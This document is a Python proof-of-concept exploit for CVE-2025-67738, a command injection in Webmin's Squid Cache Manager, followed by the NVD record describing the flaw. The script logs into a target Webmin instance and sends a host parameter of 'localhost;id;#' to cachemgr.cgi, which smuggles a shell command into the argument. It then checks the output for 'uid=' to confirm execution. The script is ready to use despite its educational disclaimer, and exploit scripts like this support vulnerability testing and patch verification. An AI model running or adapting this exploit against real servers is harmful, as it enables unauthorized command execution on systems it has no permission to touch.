CVE-2025-67738

#!/usr/bin/env python3 """ CVE-2025-67738 PoC - Webmin Squid Cache Manager Command Injection Note: This is for educational and authorized testing purposes only. """ import requests import sys def check_cve_2025_67738(target_url, username, password): """ Check if target Webmin is vulnerable to CVE-2025-67738 Requires: Webmin with Squid module, valid credentials, cms permission """ # Suppress SSL warnings for testing requests.packages.urllib3.disable_warnings() # Step 1: Login to Webmin session = requests.Session() login_url = f"{target_url}/session_login.cgi" login_data = { 'user': username, 'pass': password } try: response = session.post(login_url, data=login_data, verify=False, timeout=10) # Step 2: Check Webmin version version_url = f"{target_url}/proc/index.cgi" version_resp = session.get(version_url, verify=False, timeout=10) # Step 3: Access Squid Cache Manager with malicious payload # The vulnerability is in squid/cachemgr.cgi - arguments not properly quoted # Example: Inject command via host parameter cm_url = f"{target_url}/squid/cachemgr.cgi" # Malicious payload - inject command via unquoted argument # This would execute 'id' command malicious_params = { 'host': 'localhost;id;#', 'operation': 'info' } exploit_resp = session.get(cm_url, params=malicious_params, verify=False, timeout=10) # Check for successful command execution indicators if 'uid=' in exploit_resp.text or 'root' in exploit_resp.text: print("[+] VULNERABLE: CVE-2025-67738 detected!") print("[+] Command injection successful") return True else: print("[-] Target may not be vulnerable or exploitation failed") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python3 cve-2025-67738.py <target_url> <username> <password>") print("Example: python3 cve-2025-67738.py https://webmin:10000 admin password") sys.exit(1) target = sys.argv[1] user = sys.argv[2] passwd = sys.argv[3] check_cve_2025_67738(target, user, passwd)

{"cve": {"id": "CVE-2025-67738", "sourceIdentifier": "[email protected]", "published": "2025-12-11T07:16:00.887", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "squid/cachemgr.cgi in Webmin before 2.600 does not properly quote arguments. This is relevant if Webmin's Squid module and its Cache Manager feature are available, and an untrusted party is able to authenticate to Webmin and has certain Cache Manager permissions (the \"cms\" security option)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://github.com/webmin/webmin/commit/1a52bf4d72f9da6d79250c66e51f41c6f5b880ee", "source": "[email protected]"}, {"url": "https://github.com/webmin/webmin/compare/2.520...2.600", "source": "[email protected]"}, {"url": "https://webmin.com/security/#privilige-escalation-using-squid-module-cve-2025-67738", "source": "[email protected]"}]}}